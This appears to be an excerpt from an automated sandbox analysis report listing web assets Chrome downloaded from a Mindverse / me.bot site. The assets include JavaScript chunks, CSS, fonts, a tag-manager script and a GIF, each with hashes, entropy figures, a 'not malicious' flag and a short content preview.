                                      Preview:2:I[66513,[],"ClientPageRoot"].3:I[59294,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","8830","static/chunks/app/(mobileLayout)/(PALayout)/memory-mobile/detail/page-574a969d58697e01.js"],"default",1].4:I[39275,[],""].5:I[61343,[],""].6:I[83321,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","7487","static/chunks/49a1bf4b-d76374957333b5fc.js","595","static/chunks/595-09c9610e33be8fcc.js","5681","static/chunks/5681-43d82f1a3d805e0d.js","3122","static/chunks/3122-1f6938ed37fcf02d.js","4653","static/chunks/4653-73048479d8c69d09.js","6219","static/chunks/6219-1457be36132bf9c6.js","1073","static/chunks/1073-e4f77f384144a1c4.js","9818","static/chunks/9818-2cef5ca4ed1a1e3a.js","6701","static/chunks/6701-3887d30af462f285.js","9578","static/chunks/9578-a4316cb78831d4a3.js","4059","static/chunks/4059-ff6b23f1a12feb76.js","1025","static/chunks/1025-e8953ee90888594c.js","4595","static/chunks/4595-19c1c19690f67e9a.js","3927","static/chunks/3927-bc012ff258351a6d.js","4871","static/chunks/
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):172834
                                      Entropy (8bit):5.252467311060715
                                      Encrypted:false
                                      SSDEEP:1536:0VjExazug79h2U4kcNxakmBjt4oGZlibTR5ikxYhlUuRNka2wblHiN+wL8z9Gguk:Szug758kkEiXjOAprX2wd5WjguGOo
                                      MD5:A7B1F8EDB3A07966DB70F6240AAD77F1
                                      SHA1:2667E1E0AA78D921391A7564B51EA023A5E723FB
                                      SHA-256:DA5AAE89949F6C8FA05F88F84D6E0948C2CBFC3E5286AC327605A91725EB4F2F
                                      SHA-512:779F9CE6770516FAA65645F5196FFF3BE225683ED8CA9B94496CA2E1E0C14927C3390280EC34846F279A89FFE7BC387FA3B54A5E4CA27D9810A8EABE810676EB
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/fd9d1056-0ed4dcd63e61d9b6.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2971],{84417:function(e,t,n){var r,l=n(2265),a=n(85689),o={usingClientEntryPoint:!1,Events:null,Dispatcher:{current:null}};function i(e){var t="https://react.dev/errors/"+e;if(1<arguments.length){t+="?args[]="+encodeURIComponent(arguments[1]);for(var n=2;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n])}return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var u=Object.assign,s=l.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED,c=s.ReactCurrentDispatcher,f={pending:!1,data:null,method:null,action:null},d=[],p=-1;function m(e){return{current:e}}function h(e){0>p||(e.current=d[p],d[p]=null,p--)}function g(e,t){d[++p]=e.current,e.current=t}var y=Symbol.for("react.element"),v=Symbol.for("react.portal"),b=Symbol.for("react.fragment"),k=Symbol.for("react.strict_mode"),w=Symbol.for("react.profiler")
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (5960)
                                      Category:downloaded
                                      Size (bytes):310997
                                      Entropy (8bit):5.595673141759282
                                      Encrypted:false
                                      SSDEEP:3072:9iDZT3xrwY4s7x5MyyUAj0+06nONUPYI5iAX/pX0HdyEZsN0NEuoAsqsCpPnDcCW:EDZTqVIx5lWrr/p0H/ZsN0NlyCVDc7GM
                                      MD5:DB5461A47CEEF0F627A0E94E3B168A80
                                      SHA1:7C646421E365C33C27208C73A39E62A032BD6278
                                      SHA-256:2AE9857A612AE1B504A314DE0CC84D6C6AE90FFFDE1E88F278FC1D8578C6A48D
                                      SHA-512:C01F6B0F46D8236F8A42881C5EA0686D983D3589AFC855DC8134485CEB2605332E001262768FFB2885A087F067A0DC63300BD350D8B1DA228508D7B11CB4E8F2
                                      Malicious:false
                                      Reputation:low
                                      URL:https://www.googletagmanager.com/gtag/js?id=G-MDCC7BHCT1
                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:very short file (no magic)
                                      Category:downloaded
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:low
                                      URL:https://3j6u.viugbu.ru/phudi@cwv4vf1s
                                      Preview:1
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (9042), with no line terminators
                                      Category:downloaded
                                      Size (bytes):9042
                                      Entropy (8bit):5.406772112528784
                                      Encrypted:false
                                      SSDEEP:192:3fxBVQHp5+YMLp2k5ZGlBzQZ27RSOqZdAmJhF+zL+RMKiuJ6:JBVQHp5+YMLpwEycXTJhFgZu8
                                      MD5:3FF8CD34BB279603CEA37B77CBCC3B6B
                                      SHA1:8E27A1394E344638CD04EA63E95EBE38AEB82F6C
                                      SHA-256:298CC6B499D1879B9639D2BDB2C56452E39C3EEED42B1BFA318534540CA0716B
                                      SHA-512:32F6F8A452B0B52B0CBC3BD057D2EFAEDB868F3AC2C02CA0A1E87C9BAFE6C6CBA9A820829707DE13E016CC735484C5607149DBAE957A5255D943248C2E2F1642
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/not-found-eedd4c91a5ba7041.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9160],{43724:function(e,t,n){Promise.resolve().then(n.bind(n,18709))},91449:function(e,t){"use strict";t.parse=function(e,t){if("string"!=typeof e)throw TypeError("argument str must be a string");for(var r={},i=e.split(o),a=(t||{}).decode||n,u=0;u<i.length;u++){var s=i[u],c=s.indexOf("=");if(!(c<0)){var l=s.substr(0,c).trim(),f=s.substr(++c,s.length).trim();'"'==f[0]&&(f=f.slice(1,-1)),void 0==r[l]&&(r[l]=function(e,t){try{return t(e)}catch(t){return e}}(f,a))}}return r},t.serialize=function(e,t,n){var o=n||{},a=o.encode||r;if("function"!=typeof a)throw TypeError("option encode is invalid");if(!i.test(e))throw TypeError("argument name is invalid");var u=a(t);if(u&&!i.test(u))throw TypeError("argument val is invalid");var s=e+"="+u;if(null!=o.maxAge){var c=o.maxAge-0;if(isNaN(c))throw Error("maxAge should be a Number");s+="; Max-Age="+Math.floor(c)}if(o.domain){if(!i.test(o.domain))throw TypeError("option domain is invalid");s+=";
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text
                                      Category:downloaded
                                      Size (bytes):3774
                                      Entropy (8bit):5.436312225868273
                                      Encrypted:false
                                      SSDEEP:96:AOOEa9wOOEa2FZOhOOEatOOEaqJc+udOOEadZNtOOpa9wOOpa2FZOhOOpatOOpaj:Y9oDTPCmde9BDWyCjdw
                                      MD5:CC5C08E92B60141A3DE5E377265AF95C
                                      SHA1:F083AB76A6DD11169982595A9801CAA59DA9E380
                                      SHA-256:9C143B0D49C00D71DE9414D8461E0C25B400FCFF8FA9C7386ECC10D64A69B309
                                      SHA-512:05C6EBECDD38BFD8764316C4499F908D2056F9B7C0099C2B80D9A00C4654C88583E5708ED97F9E6EFBB4024EABF5ED9055820F1841FDE7315F5641CF90FE4E0D
                                      Malicious:false
                                      Reputation:low
                                      URL:https://fonts.googleapis.com/css2?family=Montserrat:wght@400;700&display=swap
                                      Preview:/* cyrillic-ext */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (26743)
                                      Category:downloaded
                                      Size (bytes):39982
                                      Entropy (8bit):5.297675606072276
                                      Encrypted:false
                                      SSDEEP:384:BIaCW5CK6pV04ZiucBb5ETMZehEGVgMrRI9yTqY:GaZ5ZsW4Zi/GVXG9yTp
                                      MD5:35B13EA9769AE5D6F5CB79B0AAECA6AF
                                      SHA1:A4CC36C653736A73FB40A4F10446B66164C533A2
                                      SHA-256:AF66A9018C4DAF8D685EDB4B5F271651740C8B2783AA5098ED2768F34EBB9A4B
                                      SHA-512:670ADD5B1AC6A0BF43E6D7C206739049877DE0628F4320BF2AE0DAA5A52BAB3A3940BB593C9AD2DBDBDC1DEFC98E952283F0684B60FBD99A74BCE781600CAC8D
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/
                                      Preview:<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta charSet="utf-8"/><meta content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" as="image" href="/default_logo.svg"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/643d7572cd0e36da.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/956ae0c8c2c0bec5.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/d09834458b1597d8.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/sta
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (17605), with no line terminators
                                      Category:downloaded
                                      Size (bytes):17605
                                      Entropy (8bit):5.28608809806154
                                      Encrypted:false
                                      SSDEEP:96:jS3hh2OsU5vLusVCNylv+/kSLcKKk+3LULXBlu392RYMUxNahuy2QyyyTmy8uy7+:jSxhcU5vS8jV8hSDoKgNfvYMwgLqJX
                                      MD5:75CF11A6EB0599697C5BF7E29F9AE491
                                      SHA1:E146DD3B183CBBEDBC4524202CE9EAE65239C328
                                      SHA-256:A1752D7C35D117C9C0C7444B41D3578A5DA74464CA623CB1DA64481D45EC2DA9
                                      SHA-512:CF0143D63DE7397BFDB970AA735AFF7998BF9B689472CC0AC8D509B8D14016CBAE3A976255758CC6F1B7E0DBA13B65E97B52420071F40F52BB9B0E652D71784E
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/d09834458b1597d8.css
                                      Preview:.index_container__ZH_JH{margin:6px 0;color:var(--dark-gray-color);font-size:12px;line-height:16px;text-align:center;transform:scale(.83)}.index_container__ZH_JH a{color:var(--dark-gray-color)!important}.index_container__ZH_JH .index_divide__SJYsQ{margin-right:4px;margin-left:4px}.index_form__vVmrU{display:flex;flex-direction:column;width:100%}.index_form__vVmrU .index_messageContainer__Kblu0{display:flex;align-items:center;width:400px;margin-top:8px;color:#ff4d4f;font-size:12px;line-height:18px}.index_form__vVmrU .index_messageContainer__Kblu0 .index_messageIcon__ciRRp{margin-right:8px;font-size:14px}.index_form__vVmrU .index_messageContainer__Kblu0 .index_content__XWrnj{flex:1}.index_form__vVmrU .index_messageContainer__Kblu0 .index_resendEmail__cQ_Ic{height:18px;padding:0;color:var(--primary-color);font-weight:500;cursor:pointer;font-size:12px;line-height:18px}.index_form__vVmrU .index_inputData__pxgC9{width:400px;height:44px;padding:8px 16px;font-size:16px;background-color:#fff;bord
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (22958)
                                      Category:dropped
                                      Size (bytes):34733
                                      Entropy (8bit):5.309100528415621
                                      Encrypted:false
                                      SSDEEP:384:ddYxW5W6pCtck4ghSCWuPy3w2rc+9B0Fa:7h5WsfP9B0s
                                      MD5:F37A7D86E42C0D9FDEE1E23A84C2CA20
                                      SHA1:FA7ED6DBFCC8DF00A09B90E4151CC3ACF1EDB76C
                                      SHA-256:06CA008D260117F43CF0AF5B33BE8669B06A24A4AC809CB72014055C0ED01FB5
                                      SHA-512:FF991DA58FA177CFF38B454386AEAE09514B07D990E71B84670BB1BFB39D5B3169F9E15895372C629D1675D4AF2F1D2F682E4F183A2B260956FA36A5FC42FE62
                                      Malicious:false
                                      Reputation:low
                                      Preview:<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta charSet="utf-8"/><meta content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/643d7572cd0e36da.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/956ae0c8c2c0bec5.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/d09834458b1597d8.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/f76280e80fbc714a.css" data-precedence="next"/><li
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Web Open Font Format (Version 2), TrueType, length 37828, version 1.0
                                      Category:downloaded
                                      Size (bytes):37828
                                      Entropy (8bit):7.994199601770781
                                      Encrypted:true
                                      SSDEEP:768:TLreREud92B1C5buEpioxWe6O1ESHFnLQkbknuF1dcjI5djeBX:Tu68248oxWe6O19H1zwnubdk
                                      MD5:50B140B1E97D859D6D0603414F4298EE
                                      SHA1:500E4872EE1BA9CF89F1BA626D64987B0F9AB5C9
                                      SHA-256:FDC9964050BFA24C27A3C76C6791B3674292A5F352CBC83D7A4DC49595BC3FB1
                                      SHA-512:55EF84E956A7943E3FC61A8A349E64E9F35B7DFC63402AB52B995F43A7CD4B1D2ACD300126DCDD610D0B106AF426848F998CCF154F712034422D242D6AD9130D
                                      Malicious:false
                                      Reputation:low
                                      URL:https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
                                      Preview:wOF2..............~....C..........................^...V..D?HVAR.'?MVARF.`?STAT.8'2..L+..|.../~.....$.u....0..x.6.$.... .....e..([.lq...{En.0..I..h...[....-y2..)..@(.*....T...K....$E.U.uA.b...AO..CU"O.W.]7..'............a.@...kF9.3.....xV..7.tg4#Ol.x}o.M...w...Q..))..-.i.R..&.P.......N..[F.C...x..9.|.;......d$..L.<......=.M.S..HlLHr.#+.S}..+..C....D..'^..~.}..TeT`%.......^..$....0....1 A.. ...bm..]T.E...n;._Qqm....RK.....=....\{.h.O&.D$.U......YS U..i...@.:W........p..pS....-.w.EQwp@.....},.G.@,....0IAV....P...~..0.....8..f...5..Os...5..P...n&wS+.P:.7.e.$t~.s_...z..3..Z.....}.A..2Uj...@{.:Ln.}.t.....i.>Kl.."RQ..h.;.........%...eY.E?...W..00(.z.ml.J.TPP...........G...6.=.Z%...\T....W..q...9D.m...)6..1..\.....v7......U..jr..-i.c.3iL..,\..!...b.d.A...d..C.....Ra:Q.!.M,.e.S*MC$$M.w..c.151=.m..o@.G$.X..P'..|.E."..Z.k......i"......S8..@.d.....2..t..........{..X.]SN..$....K....j5..e..,.%...T..)+.";@.v...9.R..]......,...W.iY...f..r...Q.FY.P.#...X...S
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):16668214
                                      Entropy (8bit):7.921533212250572
                                      Encrypted:false
                                      SSDEEP:393216:V1KiM6AFN9/k9/1duD4DUDwNLrffDf/f/fE:vKiM6ONSMA0wNLrn7HHE
                                      MD5:C78C42AA55544D438ACE3062BB3F5237
                                      SHA1:C3BC4B74806F5D0689AEDCE929988302856E1511
                                      SHA-256:DD88E00FE04E2A572998E74B1FE084A319D391F2852D13183B70147FBD78D977
                                      SHA-512:E3FD103005F4487ADF67446041652142B08D22AF3DF4CB70F29598C7C21AA008338F980E2D97C52949EC1C34D315E10EB63E8FE1E70A2B7F4DBFC141DDF8529F
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736845050141/gif-1.gif?number=0
                                      Preview:GIF89a...........eoN....k.hUm]L...XR/:D,.....R..NXL..l..e..U.N...R3GC..w.n2..]0.Y.}W.y^...T2..>.z&.T..^3..O....3.v.vM}F$...........e....p..w...................f....jF............jM....`E..x....y..^.........+1*...eB..ke.?.x..{9..._pji.T.z^kso|.@.c...|..Oyj^...vH.Q....~Un9.._.i...x.N........h...x..d..J.x.g.......V..Q..a..!.....j.........g.hy}[.i..{@...........!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:ADA50707CA7611EF94A5E80A6F57A235" xmpMM:DocumentID="xmp.did:ADA50708CA7611EF94A5E80A6F57A235"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (21813), with no line terminators
                                      Category:downloaded
                                      Size (bytes):21813
                                      Entropy (8bit):5.362927563577365
                                      Encrypted:false
                                      SSDEEP:384:MUCBKxdoqvSrENYT7ygwB1+RXPB4cLLpgMQiwlsAPLkO0nVgMKBB:nQrENYGB1+VBpQTxPLkO0nXKj
                                      MD5:CF95F4744214E55348BD544EB3F5B924
                                      SHA1:AE5184F9CBC35D0D0F306A9379268260D5A677AA
                                      SHA-256:94C4AF3118C736BA79E2A7C503A9E13B665E33E12F414D668C3D68209FBBF2C5
                                      SHA-512:FF3FEE72B716E8756CAF1E2DFC1C4D3080A18F660D3E2561C0BCC70B746F9A777784BAC982ED3411D51AFD45E388F92D48589E25E6DC7E50A5C68F0AF68AACB4
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/7403-fbffd249cde68380.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7403],{46934:function(t,e,n){n.d(e,{Z:function(){return G}});var a=n(2265),o=n(9772),c=n.n(o),r=n(38750),i=n(83056),l=n(214),s=n(2433),d=n(64035),g=n(46327),u=n(89443),p=n(20457),f=n(49205),m=n(24),h=n(61942);function b(t,e){return null===e||!1===e?null:e||a.createElement("span",{className:"".concat(t,"-close-x")},a.createElement(p.Z,{className:"".concat(t,"-close-icon")}))}m.Z,g.Z,u.Z,f.Z,h.Z;let v={success:g.Z,info:m.Z,error:u.Z,warning:f.Z},y=t=>{let{prefixCls:e,icon:n,type:o,message:r,description:i,btn:l,role:s="alert"}=t,d=null;return n?d=a.createElement("span",{className:"".concat(e,"-icon")},n):o&&(d=a.createElement(v[o]||null,{className:c()("".concat(e,"-icon"),"".concat(e,"-icon-").concat(o))})),a.createElement("div",{className:c()({["".concat(e,"-with-icon")]:d}),role:s},d,a.createElement("div",{className:"".concat(e,"-message")},r),a.createElement("div",{className:"".concat(e,"-description")},i),l&&a.creat
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (3615), with no line terminators
                                      Category:downloaded
                                      Size (bytes):3615
                                      Entropy (8bit):5.164735054000259
                                      Encrypted:false
                                      SSDEEP:48:3kTWhph9Eah/0hhtShhuhlahtJhtShWOrhACedyJP5EMrp+wHhl10aqOCOwzVpO5:id4ouoBJP5Ec+wHhl1rltwWwi
                                      MD5:1B6094112AB8C75CACB3F9CE3C28C390
                                      SHA1:D5D612349A8B6BBA61BE7D21EC3BC6AF267A9723
                                      SHA-256:91EE042F8A69F02056FD50CCC3E8DF7F6C298DC9E0E008B398D2D7084C381659
                                      SHA-512:67F3E6AEC33AD5539C1B8738E4576C205FF0FC51655D28BFB82D5071DB026407983C79F57B83EEFC98016A087E43E0561F9F6647E4D26B3AE8A98815687B62C1
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/621d24783829f80e.css
                                      Preview:.index_overlayClassName__lPYmO .ant-popover-content .ant-popover-inner{padding:4px;background:var(--primary-white);border:1px solid #e5e5e5;box-shadow:0 2px 8px 0 rgba(0,0,0,.1)}.index_popoverContentContainer__KqqiI{display:flex;flex-direction:column;width:120px}.index_popoverContentContainer__KqqiI .index_itemContainer__gUonc{display:flex;align-items:center;height:28px;padding:0 12px;color:var(--primary-black);font-size:12px;line-height:20px;transition:color .2s}.index_popoverContentContainer__KqqiI .index_itemContainer__gUonc .index_icon__itieU{width:16px;height:16px;margin-right:8px;font-size:16px}.index_popoverContentContainer__KqqiI .index_itemContainer__gUonc .index_questionCircle__p9ARh{width:14px;height:14px;margin-left:4px;color:var(--primary-dark-gray);font-size:14px;cursor:pointer;transition:color .3s}.index_popoverContentContainer__KqqiI .index_itemContainer__gUonc .index_questionCircle__p9ARh:hover{color:var(--primary-sub-color)}.index_popoverContentContainer__KqqiI .index
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (809), with no line terminators
                                      Category:downloaded
                                      Size (bytes):809
                                      Entropy (8bit):5.297359398590075
                                      Encrypted:false
                                      SSDEEP:12:a2Vi0cm0meK7BA41oaSDRPqVuLeF3H6lfBTKcoQm2FqH5jQXUcARh8tdjA1p:TcKD7BI5cVuY1irq05S71p
                                      MD5:034F53B562499CF7F970FFE7C24CCF8F
                                      SHA1:E40A64ADD9275544756A28F6227ACC0AE79151FF
                                      SHA-256:6561D77249715B686F48DAEDC97735AAF0A959A7FEC489319960A25D7EEA1EF0
                                      SHA-512:14EDC6B195DBFF992A621AC14E736F465BF595D27379DC211B14C913D155968904ECEA2D07D5B9D217CA72441328A879DF2AFB84E3C8B52BE924C8E50E5E0A01
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/adf4136bfcc14771.css
                                      Preview:.index_container__hGSYQ{width:calc((100% - 56px) / 5);height:40px;background:rgba(254,253,255,.5);border-radius:8px;box-shadow:0 8px 32px 0 hsla(35,42%,59%,.15);cursor:pointer;transition:all .3s ease}.index_container__hGSYQ.index_inMobile__KjTvj{width:calc((100% - 28px) / 3)}.index_container__hGSYQ:hover{background:rgba(254,253,255,.8)}.index_content__Hmg5F{display:flex;align-items:center;padding:8px 12px;overflow:hidden}.index_itemName__E_owF{display:-webkit-box;width:100%;margin-left:4px;overflow:hidden;font-weight:500;font-size:14px;font-family:Helvetica Neue,sans-serif;line-height:24px;letter-spacing:0;text-overflow:ellipsis;-webkit-box-orient:vertical;-webkit-line-clamp:1}.index_check__r1E9p{box-sizing:border-box;width:16px;height:16px;border:2px solid #756c5d;border-radius:50%;cursor:pointer}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (19310), with no line terminators
                                      Category:downloaded
                                      Size (bytes):19310
                                      Entropy (8bit):5.527465366108674
                                      Encrypted:false
                                      SSDEEP:192:A9aCeCUCjFjK116jyCFWD5fk+VYVdtVAHCEhnMNAhe9QwcE94Zb8eJY1zO5L2N76:2FGND5fk+VYPtsykePuQeJY1zO5D
                                      MD5:C3FE20BFC41E594729E91453599319FC
                                      SHA1:96AB2D5103050F380328D9C248DC2910723FCD32
                                      SHA-256:9666515D29497FFF8ADF76061DD5724087991103FBECC7B343F19F169858E60F
                                      SHA-512:ABE0EC2B9FD6FD5A9EEDE5BD95267DF9CB7197C592E6729EB68290DE20D415EDB26A5231FA23BF336FE5946E9F26274E93B08B3D8A6B9D22F2DDA1D6F34757F9
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(mobileLayout)/(PALayout)/layout-5cb8bb126be9fbd4.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1877],{69189:function(e,t,n){Promise.resolve().then(n.bind(n,83321))},83321:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return eG}});var s,i,a,r,l=n(57437),o=n(16463),c=n(2265),d=n(35986),m=n(7383),u=n(45662),x=n(50798),p=n(9772),h=n.n(p),v=n(62498),_=n(52598),g=n(4410);function j(){return(j=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var s in n)Object.prototype.hasOwnProperty.call(n,s)&&(e[s]=n[s])}return e}).apply(this,arguments)}var f=function(e){return g.createElement("svg",j({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 1024 1024"},e),s||(s=g.createElement("path",{d:"M513.43 956.9a446.13 446.13 0 0 1-173.63-857 446.13 446.13 0 0 1 347.25 821.94 443.22 443.22 0 0 1-173.62 35.06m0-822A376 376 0 1 0 779.32 245a373.57 373.57 0 0 0-265.89-110.15Z"})),i||(i=g.createElement("path",{d:"M743 545.88H283.87a35 35 0 0 1 0-70H743a35 35 0 0 1 0 70"})),a||(a
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (20951), with no line terminators
                                      Category:downloaded
                                      Size (bytes):20983
                                      Entropy (8bit):4.971613033375557
                                      Encrypted:false
                                      SSDEEP:384:U+/OlOD31Fp3ngyhtLVD4DEZdGw7DQAclY74iARr11bhr87pQfDtFcy3:6sD3NEEJDMlYu/trtN
                                      MD5:9DAE62088BD0CAC5FB90B2F458C331C7
                                      SHA1:E7F67303159DE655DE33657C72842BE5866AEF7A
                                      SHA-256:5ADBEA89C48522A657CAAD7A50DB94D02888DBE39991FEECF6DF18DCBD17C4E6
                                      SHA-512:9528BC2A29F3578E7124318C44FF90BA01BEB4A8DCE4419F5D9FC46FFE86BE668EF993F639ABA114E477B211159AFFB246B48586E35B025D63289AECDB243CDA
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/3194.9f7b7c047e3d3978.js
